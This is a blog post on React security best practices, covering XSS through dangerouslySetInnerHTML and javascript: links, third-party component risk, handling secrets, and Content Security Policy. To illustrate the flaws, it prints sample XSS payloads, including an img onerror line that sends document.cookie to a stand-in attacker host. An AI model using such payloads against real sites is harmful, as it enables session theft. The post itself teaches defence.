
React Security Best Practices: XSS, State, and CSP (2026)

React security best practices in 2026: how XSS happens in React apps, dangerouslySetInnerHTML risks, third-party component auditing, and Content Security Policy setup.

Rod

Founder & Developer

React's JSX escaping protects you from the most obvious cross-site scripting attacks. But that protection has gaps, and the gaps are exactly where React security vulnerabilities actually occur in production apps: dangerouslySetInnerHTML, third-party components that bypass React's rendering pipeline, href attributes with user-supplied values, and CSP configurations too permissive to be useful.

This post covers the React security best practices that matter in 2026: where XSS actually happens in React apps, how to handle rich content safely, what to look for in third-party components, and how to set up a Content Security Policy that works with React's architecture.


How React's Default XSS Protection Works (and Where It Stops)

React automatically escapes values you embed in JSX. This turns an attacker's attempt to inject a script tag into harmless text:

// React encodes this before rendering — safe
const userInput = '<script>alert("xss")</script>';
return <div>{userInput}</div>;
// Renders as literal text: <script>alert("xss")</script>
// Not as executable script

The encoding happens at the JSX level — React converts <, >, ", ', and & into their HTML entity equivalents before putting them into the DOM. An attacker can't break out of text context this way.
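The encoding itself is simple. Here is an illustrative sketch of the entity substitution described above (this is not React's actual implementation, just the same idea in a standalone function):

```typescript
// Illustrative sketch of entity encoding (not React's source)
function escapeHtml(s: string): string {
  return s
    .replace(/&/g, "&amp;") // & first, so the & in later entities isn't re-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}
```

Once every `<` has become `&lt;`, the browser has no tag boundary to parse, so the payload stays inert text.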

What React's escaping does NOT protect:

  • dangerouslySetInnerHTML — explicitly bypasses the escaping
  • href, src, and similar attributes with user-supplied values
  • Third-party components that use innerHTML internally
  • Dynamic <script> tag creation
  • eval() and new Function() with user data

dangerouslySetInnerHTML: The Obvious Risk

The name is the warning. dangerouslySetInnerHTML tells React to skip its escaping and inject raw HTML. When the HTML is user-generated or from an external source you don't fully control, this is an XSS vector.

// BAD: renders raw user content — XSS if content contains script tags
function UserComment({ content }: { content: string }) {
  return <div dangerouslySetInnerHTML={{ __html: content }} />;
}

If content is <img src=x onerror="fetch('https://attacker.com?cookie='+document.cookie)">, you've just exfiltrated your user's cookies.

The fix: sanitize before rendering

import DOMPurify from "dompurify";
 
// GOOD: sanitize user content before rendering as HTML
function UserComment({ content }: { content: string }) {
  const sanitized = DOMPurify.sanitize(content, {
    ALLOWED_TAGS: ["b", "i", "em", "strong", "p", "br"],
    ALLOWED_ATTR: [], // no attributes — prevents event handler injection
  });
 
  return <div dangerouslySetInnerHTML={{ __html: sanitized }} />;
}

DOMPurify is the standard library for this. It strips executable content from HTML while preserving formatting tags. Configure ALLOWED_TAGS and ALLOWED_ATTR to match exactly what your use case needs — the tighter the allowlist, the safer the output.

When can you use dangerouslySetInnerHTML safely?

When the content source is controlled by you: your own CMS, Markdown you converted to HTML with a trusted library, or content that went through sanitization on the server before storage. Never use it with raw user input.


The Less Obvious XSS: href with JavaScript Protocols

React escapes text content. It does not prevent javascript: protocol URLs in link attributes.

// BAD: user-supplied href can be javascript: protocol
function ProfileLink({ href, label }: { href: string; label: string }) {
  return <a href={href}>{label}</a>;
  // If href is "javascript:alert(document.cookie)", clicking it executes JS
}

This vector shows up in apps that let users customize their profile link, specify a "website URL," or submit any other URL that gets rendered as an anchor tag.

// GOOD: validate the protocol before rendering
function ProfileLink({ href, label }: { href: string; label: string }) {
  const isSafeUrl = href.startsWith("https://") || href.startsWith("http://");
  const safeHref = isSafeUrl ? href : "#";
 
  return (
    <a href={safeHref} rel="noopener noreferrer">
      {label}
    </a>
  );
}

The same applies to src attributes, action attributes on forms, and anywhere a URL from user input ends up as an HTML attribute.
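A stricter variant parses the URL instead of checking string prefixes, which also catches mixed-case schemes like JavaScript: that a prefix check on the raw string could miss elsewhere. The helper and its names below are hypothetical, a sketch of the allowlist approach:

```typescript
// Hypothetical helper: allowlist parsed protocols rather than string prefixes
const SAFE_PROTOCOLS = new Set(["http:", "https:", "mailto:"]);

function safeHref(href: string): string {
  try {
    // The base URL lets relative links ("/about") parse instead of throwing
    const url = new URL(href, "https://example.com");
    return SAFE_PROTOCOLS.has(url.protocol) ? href : "#";
  } catch {
    return "#"; // unparseable input degrades to an inert link
  }
}
```

The URL constructor normalizes the scheme to lowercase before the allowlist check, so case tricks don't get through.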


Third-Party React Components: The Hidden Risk

When you install a React component library, you're trusting that library's code to run in your users' browsers with the same permissions as your own code. A compromised or malicious npm package can steal cookies, exfiltrate data, and manipulate the DOM — and it would look like your own app doing it.

This isn't theoretical. Supply chain attacks against npm packages keep recurring (the event-stream and ua-parser-js compromises are two well-known examples), and the problem is getting worse. The Veracode 2025 State of Software Security report called out software composition as one of the highest-risk areas for web applications.

What to check before installing a UI component:

# Check for known CVEs in the package
npm audit --package-lock-only
 
# Check download count, last publish date, and open issues on npmjs.com
# A package last published 3 years ago with open security issues is a risk

For components that will render user content (rich text editors, markdown renderers, HTML formatters):

  • Read the component's source or at least its README to see if it uses dangerouslySetInnerHTML internally
  • Check whether it sanitizes user content before rendering
  • Check its GitHub issues for open XSS reports

The component categories that need the closest scrutiny:

  • Rich text editors (Quill, TipTap, and the now-archived Draft.js)
  • Markdown renderers that output HTML
  • PDF viewers
  • Image or video upload components
  • Any component that renders user-generated content

State Management Security: Don't Store Secrets in State

React state is accessible from browser DevTools. Anyone who opens your app in a browser can inspect component state, Redux store, and Zustand state. This is by design — it's useful for debugging.

The implication: never store sensitive values in client-side state.

// BAD: sensitive values in state are visible in DevTools
// (and REACT_APP_-prefixed env vars are baked into the client bundle at build time)
const [apiKey, setApiKey] = useState(process.env.REACT_APP_SECRET_KEY);
const [authToken, setAuthToken] = useState(response.token);
 
// GOOD: keep sensitive values server-side
// Tokens for auth go in httpOnly cookies (not accessible to JS)
// API keys that must be used client-side get limited scopes

What's safe to put in React state:

  • UI state (which tab is open, modal visibility, form field values)
  • Publicly-available data fetched from your API
  • User preferences that aren't sensitive

What to keep server-side or in httpOnly cookies:

  • Authentication tokens
  • Session identifiers
  • Any credential that proves who the user is

httpOnly cookies are set by your server, not by JavaScript. A script injected via XSS cannot read them — which is why they're the correct storage mechanism for auth tokens, not localStorage or React state.
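On the wire, that protection is just a set of Set-Cookie attributes. The helper below assembles the header value to show which attributes matter; sessionCookie is a hypothetical name, and in practice your framework's cookie API sets these for you:

```typescript
// Hypothetical helper showing the Set-Cookie attributes that matter for auth tokens
function sessionCookie(token: string): string {
  return [
    `session=${encodeURIComponent(token)}`,
    "HttpOnly",     // not readable from document.cookie, so injected JS can't steal it
    "Secure",       // only sent over HTTPS
    "SameSite=Lax", // limits cross-site sends, mitigating CSRF
    "Path=/",
    "Max-Age=3600", // one hour
  ].join("; ");
}
```

The HttpOnly and Secure flags are the ones that distinguish this from localStorage: no script in the page can read the value, and it never travels over plain HTTP.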


Content Security Policy for React Apps

A Content Security Policy (CSP) is an HTTP header that tells browsers which sources your app is allowed to load scripts, styles, images, and other resources from. It's the last line of defense against XSS — even if an attacker manages to inject code, a properly configured CSP can prevent that code from loading external resources or executing.

The challenge with React and CSP: React itself generates inline scripts and styles, especially in development mode and during hydration. A strict CSP that blocks all inline scripts will break React.

The two approaches for React + CSP:

1. Nonce-based CSP (recommended for Next.js)

Each request gets a unique nonce (a random token). Inline scripts are allowed only if they include that nonce.

// middleware.ts — Next.js 14+ supports nonce-based CSP through middleware
import { NextRequest, NextResponse } from "next/server";
 
export function middleware(request: NextRequest) {
  const nonce = Buffer.from(crypto.randomUUID()).toString("base64");
  const csp = `default-src 'self'; script-src 'self' 'nonce-${nonce}'; style-src 'self' 'nonce-${nonce}'; img-src 'self' data: https:; font-src 'self';`;
 
  // Pass the nonce to the rendered page via request headers so Next.js
  // can attach it to its inline scripts during hydration
  const requestHeaders = new Headers(request.headers);
  requestHeaders.set("x-nonce", nonce);
  requestHeaders.set("Content-Security-Policy", csp);
 
  const response = NextResponse.next({
    request: { headers: requestHeaders },
  });
 
  // Enforce the same policy on the response
  response.headers.set("Content-Security-Policy", csp);
 
  return response;
}

2. Hash-based CSP

Hash-based CSP allows specific inline scripts by their SHA hash. Less flexible for dynamic content but simpler to implement for static sites.
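The hash is the base64-encoded SHA-256 digest of the inline script's exact text, whitespace included, so even a one-character edit invalidates it. A sketch of computing the CSP source token with Node's crypto module (cspHash is a hypothetical helper name):

```typescript
import { createHash } from "node:crypto";

// Hypothetical helper: produce the CSP source token for one inline script
function cspHash(inlineScript: string): string {
  const digest = createHash("sha256").update(inlineScript, "utf8").digest("base64");
  return `'sha256-${digest}'`;
}

// The token goes into script-src, e.g.
// Content-Security-Policy: script-src 'self' 'sha256-<digest>'
```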

Start in report-only mode:

// Report violations before enforcing — catches what your app actually needs
// (report-uri is deprecated in favor of report-to, but still widely supported)
"Content-Security-Policy-Report-Only": "default-src 'self'; report-uri /api/csp-report"

Run report-only mode in staging. Review the violation reports. Build your policy based on what your app actually loads. Then switch to enforcing mode.

The Next.js security headers guide covers the full recommended headers configuration including CSP setup for Next.js apps specifically.


React Security Scanning: What Automated Tools Catch

A static analysis scanner running against your React codebase will catch:

  • dangerouslySetInnerHTML usage without sanitization
  • eval() and new Function() patterns
  • href attributes with dynamic values (flagged for manual review)
  • Dependencies with known CVEs (your React component libraries included)
  • Missing security headers on your deployed app

What scanners don't catch well: design-level issues, whether your CSP is actually effective, or whether a third-party component is malicious (it looks like legitimate code until it isn't).
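The code-pattern side of that scanning is essentially regex and AST matching over your source files. A toy version of the pattern check, illustrative only and not how any particular tool is implemented:

```typescript
// Toy pattern matcher in the spirit of a static scanner (illustrative only)
const RISKY_PATTERNS: Array<[string, RegExp]> = [
  ["dangerouslySetInnerHTML", /dangerouslySetInnerHTML/],
  ["eval", /\beval\s*\(/],
  ["new Function", /new\s+Function\s*\(/],
  ["javascript: URL", /["'`]\s*javascript:/i],
];

function findRiskyPatterns(source: string): string[] {
  return RISKY_PATTERNS.filter(([, re]) => re.test(source)).map(([name]) => name);
}
```

Real scanners work on the parsed AST rather than raw text, which is why they can also tell whether a flagged dangerouslySetInnerHTML call is fed by a sanitizer or by raw input.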

Scan your React repo free to see which of these show up in your codebase. The scan covers your package.json dependencies (including React libraries), code patterns, and your deployed URL's security headers.


Quick Reference: React Security Checklist

  • Avoid dangerouslySetInnerHTML — if you need it, sanitize with DOMPurify first
  • Validate URL protocols before using user-supplied values in href or src
  • Audit third-party components that render user content
  • Store auth tokens in httpOnly cookies, not localStorage or React state
  • Set a Content Security Policy on your deployed app
  • Add rel="noopener noreferrer" to external links opened with target="_blank"
  • Run npm audit after any dependency update
  • Scan your repo periodically for new dependency vulnerabilities

Frequently Asked Questions

Is React secure by default?

React has good XSS defaults — JSX automatically escapes values rendered in templates, which prevents most basic XSS attacks. But React's protection only covers JSX rendering. It doesn't protect against dangerouslySetInnerHTML, href attributes with javascript: protocols, third-party components that manipulate the DOM directly, or server-side rendering misconfigurations. React is a safer starting point than raw DOM manipulation, but "secure by default" overstates it.

What is XSS in React and how does it happen?

XSS in React happens when untrusted user content gets rendered as executable code rather than inert text. React prevents this in JSX by default. XSS in React typically occurs through dangerouslySetInnerHTML, href attributes containing javascript: URLs, third-party libraries that use innerHTML directly, or eval() patterns.

Is dangerouslySetInnerHTML safe to use?

dangerouslySetInnerHTML is safe when the content has been properly sanitized before rendering. The danger is using it with unsanitized user input, third-party CMS content, or any other external data you don't control. If you need to render HTML, sanitize it first with DOMPurify. If you don't need to render HTML specifically, use a different approach.

How do I add Content Security Policy to a React app?

For a Next.js app, add CSP as a response header in next.config.ts or via middleware with nonce support. For React apps on other hosting, set it as an HTTP header on your server or CDN. Start with Content-Security-Policy-Report-Only to identify violations before enforcing.

Should I audit third-party React components for security?

Yes — especially components that handle user input, render HTML, or have access to authentication state. Check the package's maintenance history, download count, and whether it has known CVEs. For components that render user-generated content, verify whether they use dangerouslySetInnerHTML internally and whether they sanitize before rendering.


Scan your repo free →

react · security · XSS · CSP · frontend-security · javascript